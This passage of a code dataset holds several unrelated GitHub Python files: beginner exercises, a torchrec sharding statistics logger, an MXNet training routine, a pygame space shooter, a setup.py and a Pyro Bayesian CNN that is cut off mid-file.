\"+str(sum(lista)))\r\n\r\ndoctest.testmod()\r\n\t","repo_name":"K8727/pyyttoni","sub_path":"ex_args_calculator.py","file_name":"ex_args_calculator.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7726615206","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\n\nclass MyError(Exception): \n # Constructor or Initializer \n def __init__(self, value, mensaje): \n# se cargan los valores enviados en el error al propio a MyError \n# para poderlo utilizar en la sección except\n self.value = value\n self.msg=mensaje\n\n\ndef division(argv):\n\n try:\n if len(sys.argv)-1 == 2: # compruebo el número de parámetros, sin contar argv[0] que es el nombre del script print(\"Has introducido 2 parámetros, es correcto!\")\n dividendo = float(sys.argv[1])\n divisor = float(sys.argv[2])\n resultado = dividendo/divisor\n print(\"El resultado de la división es: \",resultado)\n else:\n raise(MyError(len(sys.argv)-1,\"Número de parámetros incorrecto, han de ser 2.\"))\n \n except MyError as error: \n print(\"Número de parámetros: \",error.value, \"\\nMensaje: \", error.msg)\n \n except ZeroDivisionError:\n print(\"El divisor no puede ser 0\")\n except ValueError: # los parámetros han sido convertidos a enteros, float(sys.argv[i]), por tanto la excepción ha de ser de tipo ValueError y no de TypeError\n print(\"Hay un elemento de la lista que no es un número\")\n # paso al siguiente parámetro \n print(\"Sigue la ejecución del código...\")\n\n\ndivision(sys.argv)\n","repo_name":"nandocarrillo/prova","sub_path":"parametreDivisio.py","file_name":"parametreDivisio.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38651713320","text":"import logging\nfrom collections import defaultdict\nfrom typing import Union, Tuple, Optional, Any, List, Dict, cast\n\nfrom torchrec.distributed.planner.types import (\n ShardingOption,\n Stats,\n Topology,\n ParameterConstraints,\n Storage,\n)\nfrom torchrec.distributed.planner.utils import bytes_to_gb\nfrom torchrec.distributed.types import ShardingType, ParameterSharding, ShardingPlan\n\n\nlogger: logging.Logger = logging.getLogger(__name__)\n\n\nSTATS_DIVIDER = \"####################################################################################################\"\nSTATS_BAR = f\"#{'------------------------------------------------------------------------------------------------': ^98}#\"\n\n\nclass EmbeddingStats(Stats):\n \"\"\"\n Stats for a sharding planner execution.\n \"\"\"\n\n def log(\n self,\n sharding_plan: ShardingPlan,\n topology: Topology,\n num_proposals: int,\n num_plans: int,\n best_plan: List[ShardingOption],\n constraints: Optional[Dict[str, ParameterConstraints]] = None,\n ) -> None:\n \"\"\"\n Log stats for a given sharding plan to stdout.\n\n Provide a tabular view of stats for the given sharding plan with per device\n storage usage (HBM and DDR), perf, input (pooling factors), output (embedding\n dimension), and number and type of shards.\n\n Args:\n sharding_plan (ShardingPlan): sharding plan chosen by the ShardingPlanner.\n topology (Topology): device topology.\n num_proposals (int): number of proposals evaluated\n num_plans (int): number of proposals successfully partitioned\n best_plan (List[ShardingOption]): plan with expected performance\n constraints (Optional[Dict[str, ParameterConstraints]]): dict of parameter\n names to provided ParameterConstraints.\n \"\"\"\n\n shard_by_fqn = {\n module_name + \".\" + param_name: value\n for module_name, param_dict in sharding_plan.plan.items()\n for param_name, value in param_dict.items()\n }\n stats: Dict[int, Dict[str, Any]] = {\n rank: {\"type\": {}, \"pooling_factor\": 0.0, \"embedding_dims\": 0}\n for rank in range(topology.world_size)\n }\n\n used_sharding_types = set()\n compute_kernels_to_count = defaultdict(int)\n\n for sharding_option in best_plan:\n fqn = sharding_option.fqn\n\n if shard_by_fqn.get(fqn) is None:\n continue\n shard: ParameterSharding = shard_by_fqn[fqn]\n\n ranks, pooling_factor, emb_dims = self._get_shard_stats(\n shard=shard,\n sharding_option=sharding_option,\n world_size=topology.world_size,\n local_size=topology.local_world_size,\n constraints=constraints,\n )\n sharding_type_abbr = _get_sharding_type_abbr(shard.sharding_type)\n used_sharding_types.add(sharding_type_abbr)\n compute_kernels_to_count[sharding_option.compute_kernel] += 1\n\n for i, rank in enumerate(ranks):\n count = stats[rank][\"type\"].get(sharding_type_abbr, 0)\n stats[rank][\"type\"][sharding_type_abbr] = count + 1\n stats[rank][\"pooling_factor\"] += pooling_factor[i]\n stats[rank][\"embedding_dims\"] += emb_dims[i]\n\n used_hbm = [0] * topology.world_size\n used_ddr = [0] * topology.world_size\n perf = [0.0] * topology.world_size\n for sharding_option in best_plan:\n for shard in sharding_option.shards:\n storage = cast(Storage, shard.storage)\n rank = cast(int, shard.rank)\n used_hbm[rank] += storage.hbm\n used_ddr[rank] += storage.ddr\n perf[rank] += cast(float, shard.perf)\n\n table: List[List[Union[str, int]]] = [\n [\"Rank\", \"HBM (GB)\", \"DDR (GB)\", \"Perf\", \"Input\", \"Output\", \"Shards\"],\n [\n \"------\",\n \"----------\",\n \"----------\",\n \"------\",\n \"-------\",\n \"--------\",\n \"--------\",\n ],\n ]\n\n for rank, device in enumerate(topology.devices):\n used_hbm_gb = bytes_to_gb(used_hbm[rank])\n used_hbm_ratio = (\n used_hbm[rank] / device.storage.hbm\n if topology.compute_device == \"cuda\"\n else 0\n )\n used_ddr_gb = bytes_to_gb(used_ddr[rank])\n used_ddr_ratio = used_ddr[rank] / device.storage.ddr\n for sharding_type in used_sharding_types:\n if sharding_type not in stats[rank][\"type\"]:\n stats[rank][\"type\"][sharding_type] = 0\n\n rank_hbm = f\"{used_hbm_gb:.1f} ({used_hbm_ratio:.0%})\"\n rank_ddr = f\"{used_ddr_gb:.1f} ({used_ddr_ratio:.0%})\"\n rank_perf = f\"{perf[rank] / 1000:,.0f}\"\n rank_pooling = f\"{int(stats[rank]['pooling_factor']):,}\"\n rank_dims = f\"{stats[rank]['embedding_dims']:,}\"\n rank_shards = \" \".join(\n f\"{sharding_type}: {num_tables}\"\n for sharding_type, num_tables in sorted(stats[rank][\"type\"].items())\n )\n table.append(\n [\n rank,\n rank_hbm,\n rank_ddr,\n rank_perf,\n rank_pooling,\n rank_dims,\n rank_shards,\n ]\n )\n\n logger.info(STATS_DIVIDER)\n header_text = \"--- Planner Statistics ---\"\n logger.info(f\"#{header_text: ^98}#\")\n\n iter_text = (\n f\"--- Evalulated {num_proposals} proposal(s), \"\n f\"found {num_plans} possible plan(s) ---\"\n )\n logger.info(f\"#{iter_text: ^98}#\")\n logger.info(STATS_BAR)\n\n formatted_table = _format_table(table)\n for row in formatted_table:\n logger.info(f\"# {row: <97}#\")\n\n logger.info(f\"#{'' : ^98}#\")\n legend = \"Input: pooling factor, Output: embedding dimension, Shards: number of tables\"\n logger.info(f\"# {legend: <97}#\")\n logger.info(f\"#{'' : ^98}#\")\n\n compute_kernels_count = [\n f\"{compute_kernel}: {count}\"\n for compute_kernel, count in sorted(compute_kernels_to_count.items())\n ]\n logger.info(f\"# {'Compute Kernels:' : <97}#\")\n for compute_kernel_count in compute_kernels_count:\n logger.info(f\"# {compute_kernel_count : <95}#\")\n\n logger.info(STATS_DIVIDER)\n\n def _get_shard_stats(\n self,\n shard: ParameterSharding,\n sharding_option: ShardingOption,\n world_size: int,\n local_size: int,\n constraints: Optional[Dict[str, ParameterConstraints]] = None,\n ) -> Tuple[List[int], List[float], List[int]]:\n \"\"\"\n Gets ranks, pooling factors, and embedding dimensions per shard.\n\n Returns:\n ranks: list of ranks.\n pooling_factor: list of pooling factors across ranks.\n emb_dims: list of embedding dimensions across ranks.\n \"\"\"\n\n ranks = list(range(world_size))\n pooling_factor = [\n sum(constraints[sharding_option.name].pooling_factors)\n if constraints and constraints.get(sharding_option.name)\n else 0.0\n ]\n emb_dims = [sharding_option.tensor.shape[1]]\n\n if shard.sharding_type == ShardingType.DATA_PARALLEL.value:\n emb_dims = emb_dims * len(ranks)\n pooling_factor = pooling_factor * len(ranks)\n\n elif shard.sharding_type == ShardingType.TABLE_WISE.value:\n assert shard.ranks\n ranks = shard.ranks\n\n elif shard.sharding_type == ShardingType.COLUMN_WISE.value:\n assert shard.ranks\n ranks = shard.ranks\n emb_dims = [\n int(shard.shard_sizes[1])\n # pyre-ignore [16]\n for shard in shard.sharding_spec.shards\n ]\n pooling_factor = pooling_factor * len(ranks)\n\n elif shard.sharding_type == ShardingType.ROW_WISE.value:\n pooling_factor = [pooling_factor[0] / world_size] * len(ranks)\n emb_dims = emb_dims * len(ranks)\n\n elif shard.sharding_type == ShardingType.TABLE_ROW_WISE.value:\n assert shard.ranks\n host_id = shard.ranks[0] // local_size\n ranks = list(range(host_id * local_size, (host_id + 1) * local_size))\n pooling_factor = [pooling_factor[0] / local_size] * len(ranks)\n emb_dims = emb_dims * len(ranks)\n\n elif shard.sharding_type == ShardingType.TABLE_COLUMN_WISE.value:\n assert shard.ranks\n ranks = shard.ranks\n pooling_factor = pooling_factor * len(ranks)\n emb_dims = [\n int(shard.shard_sizes[1]) for shard in shard.sharding_spec.shards\n ]\n\n else:\n raise ValueError(\n f\"Unrecognized or unsupported sharding type provided: {shard.sharding_type}\"\n )\n\n return ranks, pooling_factor, emb_dims\n\n\ndef _get_sharding_type_abbr(sharding_type: str) -> str:\n if sharding_type == ShardingType.DATA_PARALLEL.value:\n return \"DP\"\n elif sharding_type == ShardingType.TABLE_WISE.value:\n return \"TW\"\n elif sharding_type == ShardingType.COLUMN_WISE.value:\n return \"CW\"\n elif sharding_type == ShardingType.ROW_WISE.value:\n return \"RW\"\n elif sharding_type == ShardingType.TABLE_ROW_WISE.value:\n return \"TWRW\"\n elif sharding_type == ShardingType.TABLE_COLUMN_WISE.value:\n return \"TWCW\"\n else:\n raise ValueError(\n f\"Unrecognized or unsupported sharding type provided: {sharding_type}\"\n )\n\n\ndef _format_table(table: List[List[Union[str, int]]]) -> List[str]:\n longest_cols = [\n (max([len(str(row[i])) for row in table]) + 3) for i in range(len(table[0]))\n ]\n row_format = \"\".join(\n [\"{:>\" + str(longest_col) + \"}\" for longest_col in longest_cols]\n )\n return [row_format.format(*row) for row in table]\n","repo_name":"terrorizer1980/torchrec","sub_path":"torchrec/distributed/planner/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72887610135","text":"#coding:utf-8\nimport time\nimport logging\nimport os\nimport sys\nimport mxnet as mx\n\n\n\ndef train(symbol = None, epochs = 1000, learning_rate = 0.00001, dump_dir = './dump', training_data = \"../data/mxnet/train.rec\", test_data = \"../data/mxnet/test.rec\", image_size = 32, batch_size = 100, test_interval = 100, gpu = 0):\n if not os.path.exists(dump_dir):\n os.mkdir(dump_dir);\n timestamp = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()));\n \n # logging\n logging_file = '%s/%s.log'%(dump_dir, timestamp);\n handler = logging.FileHandler(logging_file);\n head = '%(asctime)-15s: %(message)s'\n formatter = logging.Formatter(head);\n handler.setFormatter(formatter);\n\n logger = logging.getLogger();\n logger.addHandler(handler);\n logger.setLevel(logging.DEBUG);\n logging.info(timestamp) \n \n # data \n train_iter = mx.io.ImageRecordIter(\n shuffle=True,\n path_imgrec= training_data,\n #mean_img = data_path + \"mean32.bin\",\n rand_crop = False,\n rand_mirror = False,\n data_shape = (3, image_size, image_size),\n batch_size = batch_size,\n prefetch_buffer=4,\n preprocess_threads=3)\n\n test_iter = mx.io.ImageRecordIter(\n path_imgrec = test_data,\n #mean_img = data_path + \"mean32.bin\",\n rand_crop = False,\n rand_mirror = False,\n data_shape = (3, image_size, image_size),\n batch_size = batch_size,\n prefetch_buffer = 4,\n preprocess_threads = 1,\n round_batch = False); \n \n # dump model \n checkpoint = mx.callback.do_checkpoint('model') \n \n # train\n epoch_size = 50000 / batch_size\n model = mx.model.FeedForward(\n ctx = mx.gpu(gpu),\n symbol = symbol,\n num_epoch = epochs,\n learning_rate = learning_rate,\n momentum = 0.9,\n wd = 0.00001,\n initializer = mx.init.Xavier(factor_type=\"in\", magnitude=2.34)\n )\n\n eval_metrics = ['accuracy']\n ## TopKAccuracy only allows top_k > 1\n #for top_k in [1]:\n # eval_metrics.append(mx.metric.create('top_k_accuracy', top_k = top_k))\n\n batch_end_callback = []\n batch_end_callback.append(mx.callback.Speedometer(args.batch_size, 50))\n\n model.fit(\n X = train_iter,\n eval_data = test_iter,\n eval_metric = eval_metrics,\n batch_end_callback = batch_end_callback,\n epoch_end_callback = checkpoint)\n","repo_name":"dengdan/deep_into_DNNs","sub_path":"exp1/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39646386481","text":"import threading\nimport time\nfrom collections import deque\n\n\nclass Restaurant:\n\n def __init__(self):\n self.order_queue = deque()\n self.order_items = []\n\n def place_order(self):\n\n for item in self.order_items:\n time.sleep(0.5)\n self.order_queue.appendleft(item)\n print(\"placed order for : \", item)\n\n def serve_order(self):\n # taking order after 2 sec\n time.sleep(2)\n for item in self.order_items:\n print(\"serving order : \" + self.order_queue.pop())\n time.sleep(1)\n\n\nif __name__ == '__main__':\n\n restaurant = Restaurant()\n restaurant.order_items = ['pizza','samosa','pasta','biryani','burger']\n\n t1 = threading.Thread(target=restaurant.place_order)\n t2 = threading.Thread(target= restaurant.serve_order)\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n print(\"All orders are served..!!!\")\n\n","repo_name":"adityakonda/Python-DataStructure-and-Algorithmic-","sub_path":"codebasics/data_structures/6_queue/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12759182880","text":"import serial\nimport time\nimport struct\n# Read acceleromoter output from arduino, \n# expects output to be in space separated string.\ndef read_string(ser):\n ser.flushInput()\n # Wait a little bit for data to be written to serial\n time.sleep(.25)\n reading = ser.readline().split()\n result = None\n \n if len(reading) == 3:\n result = \"x: \" + reading[0].decode('ascii') + \\\n \", y: \" + reading[1].decode('ascii') + \\\n \", z: \" + reading[2].decode('ascii')\n else:\n result = \"poopoo\"\n \n return result\n\nif __name__ == '__main__':\n ser = serial.Serial('COM3', 115200, timeout=6)\n while True:\n print(read_string(ser))","repo_name":"uwrov/2018-2019","sub_path":"sensor/readbytes.py","file_name":"readbytes.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"16972675071","text":"# Name:\n# Date:\n\n# proj01: A Simple Program\n\n\n\n# Part I:\n# This program asks the user for his/her name and grade.\n#Then, it prints out a sentence that says the number of years until they graduate.\n\n\n#name = input(\"What's your name?\")\n#grade = int(input(\"What grade are you in?\"))\n#print(name[0].upper() + name[1:].lower() + \" will graduate in \" + str(12 - grade) + \" years.\")\n\n\n# Part II:\n# This program asks the user for his/her name and birth month.\n# Then, it prints a sentence that says the number of days and months until their birthday\n\n#Variables for Dates\ncurrent_day = 12\ncurrent_month = 6\n\n#Initial input\nname = input(\"What is your name?\")\nbirthday = int(input(\"When is your birthday?\"))\nbirth_month = str(input(\"What is your birth month?\"))\n\n#String to Number Change\nif birth_month == \"January\":\n month_num = 1\nelif birth_month == \"February\":\n month_num = 2\nelif birth_month == \"March\":\n month_num = 3\nelif birth_month == \"April\":\n month_num = 4\nelif birth_month == \"May\":\n month_num = 5\nelif birth_month == \"June\":\n month_num = 6\nelif birth_month == \"July\":\n month_num = 7\nelif birth_month == \"August\":\n month_num = 8\nelif birth_month == \"September\":\n month_num = 9\nelif birth_month == \"October\":\n month_num = 10\nelif birth_month == \"November\":\n month_num = 11\nelse:\n month_num = 12\n\n#Remaining months\nif month_num >= current_month:\n months_left = 12 - (month_num - current_month)\nelif month_num < current_month:\n months_left = 12 - (current_month - month_num)\n\n#Remaining days\nif birthday >= current_day:\n days_left = birthday - current_day\nelif birthday < current_day:\n days_left = 30 - (current_day - birthday)\n months_left = months_left - 1\n\n#Final String\nprint(name[0].upper() + name[1:].lower() + \", your next birthday is in \" + str(days_left) + \" days and \" + str(months_left) + \" months.\")\n\n\n# If you complete extensions, describe your extensions here!\n\ncurrent_year = 2018\n\nname = input(\"What is your name?\")\nbirth_date = int(input(\"What year were you born in?\"))\n\nage = current_year - birth_date\n\nif age < 13:\n print(\"You can only see G and PG movies.\")\nelif 13 <= age < 17:\n print(\"You can see G, PG, and PG-13 movies.\")\nelse:\n print(name[0].upper() + name[1:].lower() + \"can see G, PG, PG-13, and R movies\")\n\n","repo_name":"B-Ricey763/VSA-2018","sub_path":"proj01_ifelse/proj01.py","file_name":"proj01.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26346620415","text":"#############################################\r\n\"Classes for the space shooter, by Darren Ytsma\"\r\n# pylint: disable=C0103\r\nimport math\r\nimport random\r\nimport pygame\r\nfrom pygame_functions import rot_center\r\n###############################\r\n## initialize pygame and create window\r\n\r\npygame.init()\r\nwindowSurface = pygame.display.set_mode((800, 600), 0, 32)\r\npygame.display.set_caption('Space Shooter')\r\nclock = pygame.time.Clock() ## For syncing the FPS\r\n\r\nBLACK = (25, 25, 25)\r\n\r\n#############################################\r\n# Classes\r\n# The basic Ship class for both player and enemy\r\nclass Ship(pygame.sprite.Sprite):\r\n \"\"\"Ship class\"\"\"\r\n def __init__(self, image, position, height, width):\r\n\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = pygame.transform.scale(image, (height, width)).convert()\r\n self.image.set_colorkey(BLACK)\r\n self.turn = 0\r\n self.turn_speed = 0\r\n self.rad = height\r\n self.height = height\r\n self.width = width\r\n self.rect = self.image.get_rect()\r\n self.rect.x = position[0]\r\n self.rect.y = position[1]\r\n self.vel = [0, 0]\r\n self.center = height/2\r\n def draw(self):\r\n \"\"\"Draw the ship \"\"\"\r\n windowSurface.blit(rot_center(self.image, self.turn), self.rect)\r\n\r\n# Enemy ships, same as player, but bullets append to different list\r\n# and needs to be always facing the player\r\nclass Enemy(Ship):\r\n \"\"\"Enemy ship class \"\"\"\r\n # Create a seperate list of bullets for the enemys\r\n\r\n def shoot(self, enemy_bullets_sprites_list):\r\n \"\"\"enemy ship fires \"\"\"\r\n enemy_bullets_sprites_list.add(Bullet(self.rect.center, 6, self.turn))\r\n\r\n def update(self):\r\n \"\"\"find angle then draw enemy ship \"\"\"\r\n self.player_angle(player)\r\n self.draw()\r\n\r\n def player_angle(self, other):\r\n \"\"\"Find the angle between the ship and the player \"\"\"\r\n x_dist = self.rect.x-other.rect.x\r\n y_dist = self.rect.y-other.rect.y\r\n self.turn = math.degrees(math.atan2(x_dist, y_dist))\r\n\r\nclass Player(Ship):\r\n \"\"\"Player class \"\"\"\r\n def __init__(self, image, position, height, width):\r\n super().__init__(image, position, height, width)\r\n self.shoot_delay = 900\r\n self.last_shot = pygame.time.get_ticks()\r\n self.speed = 3\r\n self.bullet_speed = 6\r\n self.shooting = False\r\n\r\n def shoot(self, player_bullets_sprites_list):\r\n \"\"\"to tell the bullet where to spawn\"\"\"\r\n now = pygame.time.get_ticks()\r\n if now - self.last_shot > self.shoot_delay:\r\n self.last_shot = now\r\n player_bullets_sprites_list.add(Bullet(self.rect.center, self.bullet_speed, self.turn))\r\n # Update the position of the ship\r\n def update(self):\r\n \"\"\"Update the player ship.\r\n Have you hit wall, update location then draw \"\"\"\r\n player.hit_wall()\r\n self.turn += self.turn_speed\r\n self.rect.x += self.vel[0]\r\n self.rect.y += self.vel[1]\r\n self.draw()\r\n\r\n def hit_wall(self):\r\n \"\"\" Has the ship hit the boarder\"\"\"\r\n # if you are moving away from the boarder\r\n if (self.rect.x <= 68 and self.vel[0] > 0) or (self.rect.x >= 704 and self.vel[0] < 0):\r\n pass\r\n # If you hit the boarder you need to stop moving\r\n elif self.rect.x <= 68 or self.rect.x >= 704:\r\n self.vel[0] = 0\r\n # if you are moving away from the boarder\r\n if (self.rect.y <= 72 and self.vel[1] > 0) or (self.rect.y >= 504 and self.vel[1] < 0):\r\n pass\r\n # If you hit the boarder you need to stop moving\r\n elif self.rect.y <= 72 or self.rect.y >= 504:\r\n self.vel[1] = 0\r\n\r\n\r\n\r\nclass Bullet(pygame.sprite.Sprite):\r\n \"\"\"Bullet class \"\"\"\r\n def __init__(self, position, velocity, angle):\r\n # Call the parent class (Sprite) constructor\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = pygame.image.load(\"bullet.bmp\").convert()\r\n self.image.set_colorkey(BLACK)\r\n self.rect = self.image.get_rect()\r\n self.rect.center = position\r\n self.vel = [-velocity*math.sin(math.radians(angle)),\r\n -velocity*math.cos(math.radians(-angle))]\r\n\r\n def draw(self):\r\n \"\"\" draw bullet \"\"\"\r\n windowSurface.blit(self.image, self.rect)\r\n\r\n def update(self):\r\n \"\"\" Overloads the Sprite update\r\n Update bullets, if out of screen kill\r\n otherwise update location \"\"\"\r\n if not (self.rect.y < 525 and self.rect.y > 65 and\r\n self.rect.x < 725 and self.rect.x > 65):\r\n self.kill()\r\n self.rect.x += self.vel[0]\r\n self.rect.y += self.vel[1]\r\n self.draw()\r\n\r\n#############################################\r\n# Instance of objects\r\n# Create player, and load background\r\n\r\nplayer = Player(pygame.image.load(\"Ship.jpg\"), [410, 450], 30, 30)\r\nbackground = pygame.image.load(\"space.bmp\")\r\nbackground = background.convert()\r\n\r\nclass Pow(pygame.sprite.Sprite):\r\n \"\"\"Power up class \"\"\"\r\n def __init__(self, pos):\r\n # Call the parent class (Sprite) constructor\r\n pygame.sprite.Sprite.__init__(self)\r\n # Pick a rondom powerup\r\n self.pow_type = random.choice([\"fire_rate\", \"ship_speed\"])\r\n self.image = power[self.pow_type]\r\n # Get the rectangle of the powerup\r\n self.rect = self.image.get_rect()\r\n self.rect.x = pos[0]\r\n self.rect.y = pos[1]\r\n\r\n def draw(self):\r\n \"\"\"Draw the power up \"\"\"\r\n windowSurface.blit(self.image, [self.rect.x, self.rect.y])\r\n\r\n def update(self, other):\r\n \"\"\"update the players ships\"\"\"\r\n if self.pow_type == \"fire_rate\":\r\n other.shoot_delay -= 50\r\n elif self.pow_type == \"ship_speed\":\r\n other.speed += 1\r\n\r\n\r\n###############################################\r\n# Load power ups\r\n\r\nfire_rate = pygame.image.load(\"Fire_rate.bmp\").convert()\r\nship_speed = pygame.image.load(\"ship speed.bmp\").convert()\r\npower = {\"fire_rate\":fire_rate, \"ship_speed\":ship_speed}\r\n","repo_name":"dwaynethebard/Space-Shooter","sub_path":"Space Shooter/space_classes.py","file_name":"space_classes.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10946668879","text":"# see http://bugs.python.org/issue8876\n# this is just a quick hack so we can test build in vagrant\nimport os\nif os.environ.get('USER','') == 'vagrant':\n del os.link\n\nfrom setuptools import setup, find_packages\n\ndef requirements():\n with open('./requirements.txt', 'r') as f:\n return [line.strip() for line in f if line.strip() and not line.startswith('#')]\n\nrequirements = requirements()\n\nsetup(name='matching',\n version='0.1',\n description='LR Matching service - used as part of GOV.UK Verify',\n author='Land Registry',\n author_email='lrdev@someemail.gov.uk',\n url='https://github.com/LandRegistry/matching',\n packages=find_packages(exclude=['tests']),\n zip_safe=False,\n include_package_data=True,\n license='MIT',\n platforms='any',\n install_requires=requirements,\n classifiers=(\n 'Development Status :: 3 - Alpha',\n 'Environment :: Web Environment',\n 'Framework :: Flask',\n 'Programming Language :: Python :: 2.7',\n 'Private :: Do Not Upload',\n ),\n)\n","repo_name":"LandRegistry-Attic/matching-alpha","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"19738702539","text":"\"\"\"Creat Bayesian Neural Network\"\"\"\nfrom typing import Union\nfrom numpy.core.fromnumeric import shape\nfrom pyro.primitives import deterministic\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\n\nimport h5py\n\nfrom utils import load_data, load_configuration_file\n\nimport pyro\nfrom pyro.distributions import Normal, Categorical, Uniform\nfrom pyro.nn.module import PyroSample, PyroModule\nfrom pyro.infer import Predictive\n\nfrom pyro.infer.autoguide import AutoDiagonalNormal\nfrom scipy import stats\nimport numpy as np\nfrom models import network\nimport sys\nimport arviz as az\nimport matplotlib.pyplot as plt\n\nimport os\nif sys.platform == \"darwin\":\n os.environ['KMP_DUPLICATE_LIB_OK']='True'\n\n## pytroch random seed seeting \ntorch.manual_seed(0)\n\n#########################\n### Define models #######\n#########################\n\nclass BCNNWeak(PyroModule):\n def __init__(self, p: float, prior_std: float = 1.0) -> None:\n \"\"\"Bayesian version of CNNWeak\n\n Args:\n p (float): dropout rate\n prior_std (float, optional): standard deviation for *all* priors. Defaults to 1.0.\n \"\"\"\n super().__init__()\n\n prior = Normal(0, prior_std)\n\n self.conv1 = PyroModule[nn.Conv2d](1, 1, kernel_size=11)\n self.conv1.weight = PyroSample(prior.expand([1, 1, 11, 11]).to_event(2))\n self.conv1.bias = PyroSample(prior.expand([1]).to_event(1))\n\n self.dropout = nn.Dropout(p)\n \n self.fc1 = PyroModule[torch.nn.Linear](1*9*9, 25)\n self.fc1.weight = PyroSample(prior.expand([25, 1*9*9]).to_event(2))\n self.fc1.bias = PyroSample(prior.expand([25]).to_event(1))\n\n self.fc2 = PyroModule[torch.nn.Linear](25, 10)\n self.fc2.weight = PyroSample(prior.expand([10, 25]).to_event(2))\n self.fc2.bias = PyroSample(prior.expand([10]).to_event(1))\n\n\n \n def forward(self, x: torch.Tensor, y: torch.Tensor = None) -> float:\n \"\"\"Define a forward pass through network\n For pyro network using SVI, forward is envoked in svi.step \n\n\n Args:\n x (torch.Tensor): Input data\n y (torch.Tensor, optional): True class. Defaults to None.\n\n Returns:\n [type]: [description]\n \"\"\"\n\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = torch.flatten(x, 1)\n x = self.dropout(x)\n x = F.relu(self.fc1(x))\n x = self.dropout(x)\n x = self.fc2(x)\n with pyro.plate(\"data\", size=x.shape[0]):\n # Probs approach\n probs = deterministic(\"probs\", torch.exp(F.log_softmax(x, dim=1)))\n obs = pyro.sample(\"obs\", Categorical(probs=probs), obs=y)\n\n return probs\n\n\n#########################\n### Plotting Utils ######\n#########################\n\n@torch.no_grad()\ndef plot_param_samples(model: Union[BCNNWeak, pyro.infer.autoguide.guides.AutoDiagonalNormal], nsamples) -> None:\n \"\"\"Plot the weight and bias for one parameter set per layer\n\n Args:\n model (Union[BCNNWeak, pyro.infer.autoguide.guides.AutoDiagonalNormal]): Either a pyro model (prior) or guide (posterior)\n nsamples ([type]): number of samples to draw\n \"\"\"\n\n # For prior predictive\n if type(model) == BCNNWeak:\n layer_dict ={\n \"fc1\" : model.fc1,\n \"fc2\" : model.fc2\n }\n def weight_accessor(layer):\n return layer_dict[layer].weight\n def bias_accessor(layer):\n return layer_dict[layer].bias\n # For posterior predictive\n elif type(model) == pyro.infer.autoguide.guides.AutoDiagonalNormal:\n def weight_accessor(layer):\n return model.forward()[f\"{layer}.weight\"]\n def bias_accessor(layer):\n return model.forward()[f\"{layer}.bias\"]\n\n layers = [\"fc1\",\"fc2\"]\n\n # setup plot\n nlayers = len(layers)\n fig, ax_enum = plt.subplots(nrows=nlayers, ncols=2)\n\n # plot 1 posterior for all layers\n # sample weights and biases (for all nodes)\n weights = [[],[]]\n biases = [[],[]]\n\n for i, layer in enumerate(layers):\n\n for _ in range(nsamples):\n weights[i].append(torch.flatten(weight_accessor(layer)).numpy())\n biases[i].append(torch.flatten(bias_accessor(layer)).numpy())\n\n # Plot weight\n plt.sca(ax_enum[i,0])\n az.plot_kde(weights[i],ax=ax_enum[i,0])\n ax_enum[i,0].get_yaxis().set_visible(False)\n ax_enum[i,0].set_title(\"all nodes - weight\")\n\n # Plot bias\n plt.sca(ax_enum[i,1])\n az.plot_kde(biases[i], ax=ax_enum[i,1])\n ax_enum[i,1].get_yaxis().set_visible(False)\n ax_enum[i,1].set_title(\"all nodes - bias\")\n plt.tight_layout()\n return(weights,biases)\n\n\ndef plot_loss(train_loss: np.array, test_loss: np.array) -> None:\n\n fig = plt.figure(figsize=(8,8))\n marker_size = 4\n # Training Loss \n plt.plot(\n np.arange(1, len(train_loss)+1),\n train_loss,\n markersize=marker_size,\n color=\"orange\",\n marker=\"o\",\n label=\"Training Loss\",\n alpha=0.8 \n )\n\n plt.plot(\n np.arange(1, len(test_loss)+1),\n test_loss,\n markersize=marker_size,\n color=\"dodgerblue\",\n marker=\"o\",\n label=\"Testing Loss\",\n alpha=0.8\n )\n plt.yscale(\"log\")\n plt.xlabel(\"Epoch\", fontsize=14)\n plt.ylabel(\"Loss\", fontsize=14)\n plt.legend(frameon=False)\n\n\nif __name__ == \"__main__\":\n\n cfg = load_configuration_file(sys.argv[1])\n EPOCHS=cfg[\"epochs\"]\n\n if not os.path.exists(f\"{cfg['plotDirectory']}/train/\"):\n os.makedirs(f\"{cfg['plotDirectory']}/train/\")\n\n train_loader, _ = load_data(\n ds_start=0, ds_end=60000, train=True,\n useGPU=cfg[\"useGPU\"], b_size=cfg[\"batch_size\"], exclude_number=cfg[\"trainExcludeOneNumber\"]\n )\n\n test_loader, _ = load_data(\n ds_start=0, ds_end=10000, train=False,\n useGPU=cfg[\"useGPU\"], b_size=cfg[\"batch_size\"], exclude_number=cfg[\"testExcludeOneNumber\"]\n )\n \n pyro.enable_validation(True)\n pyro.clear_param_store()\n # Create Bayesian Convolutional Neural Net\n model = BCNNWeak(p=0.2, prior_std=1)\n \n # Create Guide - approximation to posterior\n # A parameterized 